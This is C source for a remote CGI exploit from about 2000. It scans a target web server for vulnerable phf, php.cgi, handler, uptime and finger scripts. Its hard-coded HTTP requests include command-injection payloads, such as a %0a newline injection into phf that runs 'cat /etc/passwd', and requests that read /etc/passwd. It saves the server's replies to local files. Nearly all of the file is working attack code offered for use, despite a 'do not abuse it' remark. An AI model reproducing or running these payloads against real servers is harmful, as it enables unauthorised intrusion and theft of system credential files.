/* * DESIGNER: ZinC_Sh(C) E-Mail: zinc_sh@hotmail.com * * DATE: Mon Feb 14 15:28:19 GMT+2 2000 @601 * * MADE ON: linux SLackWarE.- * * GREETINGS: Packo, BlackSouL.- * * COMPILE: gcc -o rcgix rcgixploit.c * * DESCRIPTION: Remote Cgi Exploit, looking For PHF ,PHP ,HANDLER ,UPTIME, * FINGER and try to Collect Useful FILES such as /etc/passwd.- * * * P.S. DO NOT ABUSE IT.- * * May The Poula Kapribekou Be With You... */ #include #include #include #include #include #include #include #include #include #include #include #include #define OXO 1 #define PORT 80 #define STRING "200 OK" #define PHF "GET /cgi-bin/phf/?Qalias=X%0acat%20/etc/passwd HTTP/1.0\n\n" #define PHP "GET /cgi-bin/php.cgi?/etc/passwd HTTP/1.0\n\n" #define HANDLER "GET /cgi-bin/handler?cat%20/etc/passwd HTTP/1.0\n\n" #define UPTIME "GET /cgi-bin/uptime HTTP/1.0\n\n" #define FINGER "GET /cgi-bin/finger?root HTTP/1.0\n\n" int usage(char *ARG) { fprintf(stderr,"Usage: %s .-\n",ARG); fprintf(stderr,"Examp: %s <2> <80>.-\n\n",ARG); } void comm(void) { printf("-[ Remote Cgi Exploit ]- By -[ ZinC_Sh(C) ]-\n"); } int main(int argc, char **argv) { struct sockaddr_in addr; struct hostent *rh; FILE *fd; char buffer[BUFSIZ]; char for_switch; int result; int con,sock; int ptr; if (argc < 3 || argc > 4){ usage(argv[0]); menu(); comm(); poula_kapribekou(); exit(OXO); } if((rh=gethostbyname(argv[2])) == NULL) { perror("gethostbyname"); exit(OXO); } memset(buffer,0,BUFSIZ); if ((sock=socket(AF_INET,SOCK_STREAM,0)) == -1) { perror("Socket"); exit(OXO); } if (argv[3] == NULL) ptr=PORT; else ptr=atoi(argv[3]); addr.sin_family = AF_INET; addr.sin_port = htons(ptr); addr.sin_addr = *((struct in_addr *)rh->h_addr); bzero(&(addr.sin_zero),8); if ((con=connect(sock,(struct sockaddr *)&addr, sizeof(addr))) != 0) { perror("connect"); fprintf(stderr,"Can Not Connect To The Remote Host\n"); exit(OXO); } sscanf(argv[1],"%s",&for_switch); result=switching(for_switch); if (result == 1) { send(sock,PHF,sizeof(PHF),0); recv(sock,buffer,sizeof(buffer),0); if ((strstr(buffer,STRING)) != 0 ) { printf("\nFOUND! PHF Script on The Remote Host.-\n"); printf("Wait, LoadInG Lynx...\n"); fd=fopen("PHF.results","a"); fputs(buffer,fd); fclose(fd); system("lynx PHF.results"); } else { printf("\nPHF Script Not Found\n"); } } if (result == 2) { send(sock,PHP,sizeof(PHP),0); recv(sock,buffer,sizeof(buffer),0); if ((strstr(buffer,STRING)) != 0 ) { printf("\nFOUND! PHP Script on The Remote Host.-\n"); printf("Wait, LoadInG Lynx...\n"); fd=fopen("PHP.results","a"); fputs(buffer,fd); fclose(fd); system("lynx PHP.results"); } else { printf("\nPHP Script Not Found\n"); } } if (result == 3) { send(sock,HANDLER,sizeof(HANDLER),0); recv(sock,buffer,sizeof(buffer),0); if ((strstr(buffer,STRING)) != 0 ) { printf("\nFOUND! HANDLER Script on The Remote Host.-\n"); printf("Wait, LoadInG Lynx...\n"); fd=fopen("HANDLER.results","a"); fputs(buffer,fd); fclose(fd); system("lynx HANDLER.results"); } else { printf("\nHANDLER Script Not Found\n"); } } if (result == 4) { send(sock,UPTIME,sizeof(UPTIME),0); recv(sock,buffer,sizeof(buffer),0); if ((strstr(buffer,STRING)) != 0 ) { printf("\nFOUND! UPTIME Script on The Remote Host.-\n"); printf("Wait, LoadInG Lynx...\n"); fd=fopen("UPTIME.results","a"); fputs(buffer,fd); fclose(fd); system("lynx UPTIME.results"); } else { printf("\nUPTIME Script Not Found\n"); } } if (result == 5) { send(sock,FINGER,sizeof(FINGER),0); recv(sock,buffer,sizeof(buffer),0); if ((strstr(buffer,STRING)) != 0 ) { printf("\nFOUND! FINGER Script on The Remote Host.-\n"); printf("Wait, LoadInG Lynx...\n"); fd=fopen("FINGER.results","a"); fputs(buffer,fd); fclose(fd); system("lynx FINGER.results"); } else { printf("\nFINGER Script Not Found\n"); } } close(sock); return 0; } int switching(int CMD) { switch(CMD) { case '1':{ printf ("Looking For phf Script on The Remote Machine.-\n"); printf ("Wait..."); return 1; } case '2':{ printf ("Looking For php Script on The Remote Machine.-\n"); printf ("Wait..."); return 2; } case '3':{ printf ("Looking For handler Script on The Remote Machine.-\n"); printf ("Wait..."); return 3; } case '4':{ printf ("Looking For uptime Script on The Remote Machine.-\n"); printf ("Wait..."); return 4; } case '5':{ printf ("Looking For finger Script on The Remote Machine.-\n"); printf ("Wait..."); return 5; } default :{ printf ("What The Fuck IS This ??? Choose a Cgi-N From The List.-\n"); break; } } } poula_kapribekou(void) { printf("-[ May The Poula KApribekou Be With YOu... ]-\n"); } menu(void) { printf("|N| CGIs |------------------------| DESCRIPTION |----------------------|\n"); printf("|-|---------|-------------------------------------------------------------|\n"); printf("|1| phf)| phf, Looking For /etc/passwd file on The Remote machine |\n"); printf("|2| php)| PHP.cgi, Looking For /etc/passwd file on The Remote machine |\n"); printf("|3| handler)| Handler, Looking For /etc/passwd file on The Remote machine |\n"); printf("|4| uptime)| uptime, Looking for (Time,date,Users) on the Remote machine |\n"); printf("|5| finger)| Finger, Execute 'finger Command' Through the Web |\n"); printf("|-|---------|-------------------------------------------------------------|\n\n"); }